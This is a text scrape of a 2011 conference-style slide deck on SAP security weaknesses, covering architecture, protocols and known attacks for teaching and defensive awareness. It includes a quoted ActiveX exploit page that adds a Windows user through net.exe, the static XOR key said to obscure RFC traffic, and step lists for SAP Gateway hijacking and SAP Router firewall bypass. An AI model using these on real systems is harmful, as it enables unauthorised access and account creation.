Upload
haliem
View
216
Download
2
Embed Size (px)
Citation preview
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 2 SAP (in)security – FH St.Pölten
English (That was obvious really)
Network and Web-App Penetration Tester
Working for Raiffeisen Informatik Security Competence Center in Zwettl
13+ years working in IT (unlucky 13 ?)
A bit of everything really… „Jack of all trades“
Still learning something new everyday
As we all should!
Blogger and Twitterer (is that even a word ?) Bloger (http://blog.c22.cc)
Twitterer (@ChrisJohnRiley)
Podcaster (Eurotrash Security Podcast - NSFW)
world$whoami
Chris John Riley
„The wisest man is he who knows that he knows nothing"
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 3 SAP (in)security – FH St.Pölten
What we’ll cover today
SAP Basics
SAP Architecture
SAP Components
SAP Threats / Attacks
SAP Conclusions
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 4 SAP (in)security – FH St.Pölten
2. SAP Architecture
3. SAP Components
1. SAP BASICS
4. SAP Threats / Attacks
5. SAP Conclusions
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 6 SAP (in)security – FH St.Pölten
What is SAP?
“…the world's leading provider of
business software, SAP (which stands
for "Systems, Applications, and
Products in Data Processing") delivers
products and services that help
accelerate business innovation for our
customers.”
source: sap.com
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 7 SAP (in)security – FH St.Pölten
SAP Offerings
ERP
(Enterprise Resource Planning)
CRM
(Customer Relationship Management)
SCM
(Supply Chain Management)
PLM
(Product Life-cycle Management)
SRM
(Supplier Relationship Management)
GRC
(Governance, Risk and Compliance)
What is SAP?
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 8 SAP (in)security – FH St.Pölten
What is SAP?
Customers in 120 countries
More than 100,000 clients worldwide
More than 40,000 employees
More than 140,000 SAP implementations
Covering every possibly industry
From Automotive
To Wholesale Distribution
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 9 SAP (in)security – FH St.Pölten
source: sap.com
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 10 SAP (in)security – FH St.Pölten
What is SAP?
Growing target, despite it’s complexity
Holds the keys to the kingdom
Financial data
Personal data
Client data
Business workflows
…
Surely such an important system must be secured!
RIGHT?
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 11 SAP (in)security – FH St.Pölten
Source: h-online.com
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 12 SAP (in)security – FH St.Pölten
2010 Patches
2010: SAP releases more than 900 fixes Large complex systems will always have configuration issues
Vulnerabilities per line of code?
*Industry Average: “~15 - 50 errors per 1000 lines of delivered code"
Code Execution
Buffer Overflows
Cross-Site Scripting
….
*source: "Code Complete" by Steve McConnell
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 13 SAP (in)security – FH St.Pölten
2. SAP Architecture
3. SAP Components
1. SAP BASICS
4. SAP Threats / Attacks
5. SAP Conclusions
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 14 SAP (in)security – FH St.Pölten
SAP Architecture
SAP R/3 (ABAP)
mySAP Netweaver (JAVA/ABAP)
– Three Tier Client/Server arch.
Presentation Server
Application Server
Database Server
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 15 SAP (in)security – FH St.Pölten
PRD
QAS
DEV
RFC
RF
C
DIAG
HTTP/
HTTPS
mySAP
Ext. Customer
Ext. Server
SAP Building Blocks
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 16 SAP (in)security – FH St.Pölten
SAP Building Blocks
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 17 SAP (in)security – FH St.Pölten
SAP Building Blocks
SAP DATABASE
SERVER
Clients
000 | SAPR | Default
001 | SAPR | Default
066 | EARLY | Default
500 | CLIENT1 | CUST
501 | CLIENT2 | CUST
502 | CLIENT3 | CUST
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 18 SAP (in)security – FH St.Pölten
QAS
DEV
PRD
RFC
RF
C
DIAG
HTTP/
HTTPS
mySAP
Ext. Customer
Ext. Server
SAP Building Blocks
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 19 SAP (in)security – FH St.Pölten
QAS
DEV
PRD
RFC
RF
C
DIAG
HTTP/
HTTPS
mySAP
Ext. Customer
Ext. Server
SAP Building Blocks
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 20 SAP (in)security – FH St.Pölten
SAP Building Blocks
Connection protocols
DIAG
Client Connection – SAPGUI
RFC
Server to Server Connection
HTTP/HTTPS
WEBGUI
WebServices (Agate/Wgate/ITS)
Database
TNS Listener (Oracle)
JDBC
….
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 21 SAP (in)security – FH St.Pölten
DIAG
Used for SAPGUI connections
Connections on port 32<instance> (e.g. 3200)
Proprietary Protocol
Supports some RFC request types (sRFC)
Compressed
Non-standard compression
Decompression tools available
Basically, clear-text!
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 22 SAP (in)security – FH St.Pölten
RFC
Used for Server connections
Most used SAP protocol
Proprietary Protocol
Different Types of RFC communications
Synchronous (sRFC)
Asynchronous (aRFC)
Transactional (tRFC)
Queued (qRFC)
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 23 SAP (in)security – FH St.Pölten
RFC
Helpful API released by SAP (rfcsdk)
Supports ext. clients / servers
Traffic is encrypted*
SAP offers SNC encryption at a cost!
Key = [0x96, 0xde, 0x51, 0x1e, 0x74, 0xe, 0x9, 0x9, 0x4, 0x1b, 0xd9,
0x46, 0x3c, 0x35, 0x4d, 0x8e, 0x55, 0xc5, 0xe5, 0xd4, 0xb, 0xa0, 0xdd,
0xd6, 0xf5, 0x21, 0x32, 0xf, 0xe2, 0xcd, 0x68, 0x4f, 0x1a, 0x50, 0x8f,
0x75, 0x54, 0x86, 0x3a, 0xbb]
* Traffic is XOR’d with a static key That was a good idea
Basically clear-text!
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 24 SAP (in)security – FH St.Pölten
SNC
SAP’s solution to the unencrypted communications of
DIAG/RFC
Provides integrity and/or privacy
External product
Naturally… it’s an add-on ($$$)
Not simple to implement (PKI?)
After thought?
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 25 SAP (in)security – FH St.Pölten
SAP Teched 2011
r
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 26 SAP (in)security – FH St.Pölten
2. SAP Architecture
3. SAP Components
1. SAP BASICS
4. SAP Threats / Attacks
5. SAP Conclusions
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 27 SAP (in)security – FH St.Pölten
SAP Gateway
Handles ALL CPIC/RFC communications
Communications between SAP systems
Communications between SAP and External systems
Works in 2 modes
Started Mode
Application Server Starts on demand
Connection is closed after operation completes
Registered Mode
External server registers itself at the Gateway
Program ID (TPNAME) used to identify connection
External server connection remains open
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 28 SAP (in)security – FH St.Pölten
SAP Gateway
Round-Robin / Load Balancing support
Multiple servers can register as the same ID (TPNAME)
Service is locked while a request is being handled
Remote server can perform connectbacks to client
While a client is connected, the remote server can instruct them to
perform actions on other SAP servers
Default SAP configuration
No auth required
Anybody can register
Not usually web accessible
At least, that‘s what I thought! SAP SERVER
SAP
GATEWAY
SER1
SER_EXT
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 29 SAP (in)security – FH St.Pölten
SAP Gateway
* source: http://sap.com
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 30 SAP (in)security – FH St.Pölten
SAP Router
SAP version of a reverse proxy
Designed to analyze / restrict SAP network traffic that is passed through
the firewall
Sits on the perimeter (internet accessible!)
Listens on port 3299/tcp
Filters based on IP address / protocol
Logs activity
Enforces password security / SNC
Syntax: /H/host/S/service/W/password
Not all parameters are required
(/S/, /W/ are optional)
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 31 SAP (in)security – FH St.Pölten
SAP Router
source: http://help.sap.com
Official SAP Router Diagram
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 32 SAP (in)security – FH St.Pölten
SAP Router
Why would you want to do that!
Connections from external partners
Remote Administration
Internal staff
Required for SAP AG (mandatory)
Monitoring
Troubleshooting
…
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 33 SAP (in)security – FH St.Pölten
SAP Router - saprouttab
Example:
D 192.168.0.1 192.168.0.200 servicex
P 192.168.1.1 192.168.0.200 3300 passwd
S 192.168.2.2 192.168.0.200 * sappwd
KP * 192.168.0.200 4444
....
First-match / Deny on no match D – Deny
P – Permit
S – Permit SAP Protocol only
Kx – Force SNC (e.g KP, KS)
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 34 SAP (in)security – FH St.Pölten
SAP Router
Example (realistic):
saprouttab
----------------------------------------------------------------------------------
P * * *
----------------------------------------------------------------------------------
Permit any/any
Well it works!
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 35 SAP (in)security – FH St.Pölten
SAP Router (New)
Permit any/any still works (but not for everything)
* in the service field no long means ANY
* Excludes non-SAP services
This means no more firewall bypasses!
… or does it!
Commonly seen examples:
P 10.*.*.* * 3389 #Remote Desktop Protocol
P 10.1.*.* 10.2.*.* 5601 #PcAnywhere
P * * telnet
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 36 SAP (in)security – FH St.Pölten
SAP Web Dispatcher
Acts as a reverse proxy / load balancer for HTTP(S) requests
Load Balancing, selecting the appropriate Application Server
Sits on the perimeter
Hides internal infrastructure
Filters URLs
Implements SSL in 2 modes
end-to-end – Connections forwarded without decryption
SSL Terminator – Connections decrypted to the dispatcher
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 37 SAP (in)security – FH St.Pölten
SAP ITS / ICM
ITS (Internet Transaction Server)
Enables Web Access to SAP Applictions
Translates Dialog screens into HTML
SAPGUI for the Internet!
ICM (Internet Communication Manager)
Direct access to SAP Application Server through HTTP(S) / SMTP
Unlike ITS, users don‘t need to interact with middleware
Requests handled directly by the Web Application Server
SAP in the Internet age!
Now even China can see your customer list!
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 38 SAP (in)security – FH St.Pölten
SAP WebServices
SAP Management Consoles communication channel
Communicates over port 5<instance>13/14 (e.g. 50013)
Can use SSL for transport encryption
Port 50014
Uses BASIC auth for some functions
Windows:
MMC Plug-in, uses SOAP requests in the background
*nix:
JAVA Applet, uses SOAP requests in the background
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 40 SAP (in)security – FH St.Pölten
The B!G picture
How often are these ports open to the world?
AKA: Scanning a small country
Ports 3299, 3300, 50013, 50014
SYN scan only
We don‘t want to connect to them after all!
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 41 SAP (in)security – FH St.Pölten
2570
2580
2590
2600
2610
2620
2630
2640
2650
2660
SAP Ports Austria
SAP Router
(3299)
SAP Gateway
(3300)
SAP MC
SAP MC (SSL)
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 42 SAP (in)security – FH St.Pölten
2. SAP Architecture
3. SAP Components
1. SAP BASICS
4. SAP Threats / Attacks
5. SAP Conclusions
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 43 SAP (in)security – FH St.Pölten
Drinking from the firehose
of information technology
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 44 SAP (in)security – FH St.Pölten
CWE-319*: Cleartext Transmission of Sensitive
Information
RFC – XOR (CWE-321*: Use of Hard-coded Cryptographic Key)
DIAG – Encoded/Compressed
SOAP over HTTP
ICM/IST over HTTP
Usage of SSL / SNC optional
Costs
Costs
* (http://cwe.mitre.org)
What we’ve already seen
PRD
QAS
DEV
RFC
RF
C
DIAG
HTTP/
HTTPS
mySAP
Ext. Customer
Ext. Server
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 45 SAP (in)security – FH St.Pölten
What we’ve already seen (SAPGUI)
Attacks
• Man in the Middle
• Replay Attacks
• Sniffing (usernames, passwords)
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 46 SAP (in)security – FH St.Pölten
What we’ve already seen (SAP Database)
No seperation of client data
All Client data is stored in the same Database
One hack to rule them all!
Developers can run direct SQL queries
Attacks can gain access through one client and access ALL data
No valid seperation of permissions on the DB
SAP SERVER
Clients
000 | SAPR | Default
001 | SAPR | Default
066 | EARLY | Default
500 | CLIENT1 | CUST
501 | CLIENT2 | CUST
502 | CLIENT3 | CUST
Attacks
• Exposure of client data
• Command injection through DB
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 47 SAP (in)security – FH St.Pölten
What we’ve already seen (ORACLE)
Oracle Database
Have you heard of OSAUTHENT?
Remote OS Authentication (sounds harmless)
Trusts the remote system to perform authentication!
OPS$
Connection Example:
1. User logged into remote system as sapadm
2. Connects to Oracle TNS Listener (port 1521)
3. User says „I‘m authenticated on my system as sapadm“
4. Oracle server replies „Yes sir! Welcome sapadm“
5. Profit!
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 48 SAP (in)security – FH St.Pölten
What we’ve already seen (ORACLE)
Oracle Database
It‘s ok though, you can turn that feature off
remote_os_authent = false
As long as you set the username / password to a static value
SAPR3:PASS
Attacks
• Complete SAP DB access
• NO PASSWORD REQUIRED!
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 49 SAP (in)security – FH St.Pölten
What we’ve already seen (SAP Gateway)
SAP Gateway Registration
Remote systems register themselves with the SAP server
What would happen if an attacker registers?
No authentication by default
Anybody can be a server!
SAP SERVER
SAP
GATEWAY
SER1
ATTACKER1
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 50 SAP (in)security – FH St.Pölten
SAP Gateway - Exploitation
Attacks
• Evil Twin / Man in the Middle
• Denial of Service SAP SERVER
SAP
GATEWAY
SER1
REG AS
SER1
BLOCKED
IN-USE
1. Attacker connects to the existing registered server (ID=SER1)
2. By maintaining this connection the registered server is blocked
3. Attacker registers themselves on the gateway as ID=SER1 also
4. Wait for connections from clients/servers
5. Profit!
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 51 SAP (in)security – FH St.Pölten
What we’ve already seen (RFC)
Many other issues with RFC
Insecure functions
RFC_DOCU
RFC_PING
RFC_SYSTEM_INFO
RFCEXEC
Buffer Overflows
….
Attacks
• Lack of authentication on RFC functions
• Exposure of information
• Command injection
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 52 SAP (in)security – FH St.Pölten
What we’ve already seen (SAP Router)
SAP Router
Designed to route traffic
Why not take advantage of those ANY:ANY rules to bypass the firewall
Connect through the SAProuter port using tsocks
Attack the weak underbelly of the server!
Attacks
• Firewall Bypass ATTACKER
TCP 1521
TCP 1521
ORACLE
DBRFC ROUTED
SAP SERVER
SAP
ROUTER
ROUTED
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 53 SAP (in)security – FH St.Pölten
What we’ve already seen (Client-Side)
Patching Client-Side Applications it still a problem
Often no central management
Why patch it if it works!
Client-Side ActiveX
SAPGUI
Lots of Client-Side exploits public
Some very simple to exploit
Attacks
• Client-Side Code Execution
• Web-Based Exploitation (ActiveX)
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 54 SAP (in)security – FH St.Pölten
Client-Side ActiveX – Exploit Example
<html>
<title>*DSecRG* Add user *DSecRG*</title>
<object classid="clsid:A009C90D-814B-11D3-BA3E-080009D22344"
id='DH'></object>
<script language='Javascript'>
function init()
{ DH.Execute("net.exe","user don_huan p4ssW0rd
/add","d:\\windows\\",1,"",1);}
init();
</script>
</html>
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 55 SAP (in)security – FH St.Pölten
Current Research
WebServices (Management Console)
SOAP requests, many unauthenticated
Enabled by default on ALL SAP systems
Lots of interesting peice of information for an attacker
Data extraction Surely there‘s nothing useful here!
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 56 SAP (in)security – FH St.Pölten
Current Research
WebServices (Management Console)
Unauthenticated access to :
SAP Version information (down to patch level)
SAP Startup profile
SAP Instance properties
System environment variables
List SAP logfiles
Download / View complete logfiles
Including username information
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 57 SAP (in)security – FH St.Pölten
Current Research
WebServices (Management Console)
Automate the extraction of data with Metasploit*
source: http://blog.c22.cc
Attacks
• Information Disclosure
• Extraction of Usernames
• SAP Instance information
• Extract Version information
• OSexecute
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 58 SAP (in)security – FH St.Pölten
WebService - Version Information
…
[+] [SAP] Version: 720, patch 70, changelist 1203517, optU, NTintel
[+] [SAP] SID: NSP
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 59 SAP (in)security – FH St.Pölten
WebService – Start Profile
[+] SAPSYSTEMNAME – NSP
[+] SAPGLOBALHOST – WINXPSAP-TST
[+] SAPSYTEM – 00
[+] INSTANCE_NAME – DVEBMGS00
…
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 60 SAP (in)security – FH St.Pölten
WebService – Instance / Environment
[+] SAP SYSTEM NUMBER: 00
[+] SAP SYSTEM NAME: NSP
[+] ICM URL: HTTP://WINXPSAP-TST/ICM
[+] DATABASE: Database-SAPDB
…
[+] COMPUTERNAME=WINXPSAPTST
[+] PATH: …
[+] PROCESSOR ARCHITECTURE =x86
…
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 61 SAP (in)security – FH St.Pölten
WebService – Log Files
Information Disclosure
• SAP Status
• Startup Times
• PID
• Errors
• Debug data
• …
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 62 SAP (in)security – FH St.Pölten
WebService – Log Files (extract users)
Information Disclosure
• Usernames
• Lockout information
• …
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 63 SAP (in)security – FH St.Pölten
SAP Management Console
Goldmine of information
As we‘ve seen
The present that keeps on giving!
But there‘s more…
Ability to brute-force passwords
Output a FULL configuration!
Execute commands on the remote server
Gain shell access
…
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 64 SAP (in)security – FH St.Pölten
2. SAP Architecture
3. SAP Components
1. SAP BASICS
4. SAP Threats / Attacks
5. SAP Conclusions
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 65 SAP (in)security – FH St.Pölten
Conclusions
Historical SAP Security
Seperation of privileges
Developer access checks
Debug permissions
Password policies
ABAP code security
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 66 SAP (in)security – FH St.Pölten
Conclusions
The new School
Infrastructure attacks
Database vulnerabilties
Buffer overflows (saplpd, ...)
Web Application vulnerabilities
XSS
CSRF
Attacks against the clients
SAPGUI
ActiveX components
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 67 SAP (in)security – FH St.Pölten
Conclusions
SAP – The new hottness
Blackhat DC / Las Vegas
DefCon
Troopers
DeepSEC
Blackhat EU
BSides
….
SAP Presentations are the new black!
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 68 SAP (in)security – FH St.Pölten
Patching SAP
Patches are released monthly
To coincide with MS patch Tuesday
Very limited information sharing outside of acknowledgments
Note
• Imagine running that process for 500 patches!
• Don’t forget to patch the OS, DB, clients
• Not a simple prospect!
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 69 SAP (in)security – FH St.Pölten
Patching SAP (server)
Applying patches
Download each patch from SAP (registration required)
Apply to DEV/QA systems using SPAM (SAP Patch Manager)
Perform required testing
Schedule downtime
All users must be logged off during update process
Apply to PROD using SPAM
Perform required testing
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 70 SAP (in)security – FH St.Pölten
Patching SAP (custom code)
Patching troubles
Often patches break existing functionality/code
3rd Party patching solutions available
Panaya - SAP Upgrade Automation
Analyses custom code
Tells you what could break!
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 71 SAP (in)security – FH St.Pölten
Patching SAP (client)
Regular patches to correct client-side security flaws
Supported in PSI/CSI*
Simple central rollout
Often forgotten!
* Limited information on secunia website
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 72 SAP (in)security – FH St.Pölten
Hardening?
Searching for „hardening“ on the SAP site results in documents dating from ~2006
Other results including people requesting hardening guidance
SAP Hardening guides
SAP hardening and patch management guide for Windows server http://www.sdn.sap.com/irj/sdn/go/portal/prtroot/docs/library/uuid/31d3e9ef-0c01-0010-01b8-8fbf154c0aca
Last updated 08 August 2008
help.sap.com Range of (mostly business) best practise guides
Best practice / Secure programming references
Some limited security documentation
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 73 SAP (in)security – FH St.Pölten
Conclusions
This presentation only scratches the
surface
SAP released more than 900 fixes in 2010
Large complex system
Many bugs yet to be discovered!
SAP has become, and will remain a prime
target for attackers
All the good stuff in one place
Keys to the kingdom
Bad patching practices
If it‘s not broken don‘t fix it
Never touch a running system
Lack of information from SAP
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 74 SAP (in)security – FH St.Pölten
Questions?
Comments?
Abuse!
Chris John Riley, Raiffeisen Informatik GmbH | 17.10.2011 | 75 SAP (in)security – FH St.Pölten
Thank you for your attention!
Raiffeisen Informatik GmbH
Lilienbrunngasse 7-9
A-1020 Wien
T +43 1/99 3 99 - 0
F +43 1/99 3 99 - 1100
www.raiffeiseninformatik.at